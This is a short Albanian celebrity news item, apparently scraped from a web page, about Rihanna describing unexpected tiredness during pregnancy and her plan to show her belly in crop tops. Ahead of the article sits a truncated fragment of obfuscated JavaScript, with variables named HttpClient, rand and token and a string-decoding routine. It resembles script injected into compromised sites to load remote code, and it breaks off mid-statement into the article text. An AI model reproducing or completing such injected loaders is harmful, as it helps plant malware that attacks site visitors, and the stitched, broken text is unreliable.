;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nënat e kuptojnë se për çfarë po flet Rihanna kur tregon për këtë simptomë të shtatzënisë

By

Në një intervistë për Extra, Rihanna u shpreh se si zbuloi një simptomë të të qenit shtatzënë që e habiti. Ajo tregoi se ndihej aq e lodhur dhe “e këputur” sa i dukej e habitshme pasi kjo është një gjë me të cilën nuk është mësuar, duke qenë njeri shumë aktiv.

Rihanna tregoi se si nga mbretëresha e jetës së natës, kaloi në një mbretëreshë të përgjumur, ndërsa rrëfeu se si shtatzënia ka shkaktuar një ndryshim në mënyrën se si ajo e sheh trupin e saj.

“Zakonisht kur jam në tapetin e kuq dhe barku im është pak i madh, është pak problem”, tha ajo, duke shtuar se tani që është shtatzënë do ta tregojë barkun gjithë kohës duke veshur crop top. /Prive.al

Artikuj të ngjashëm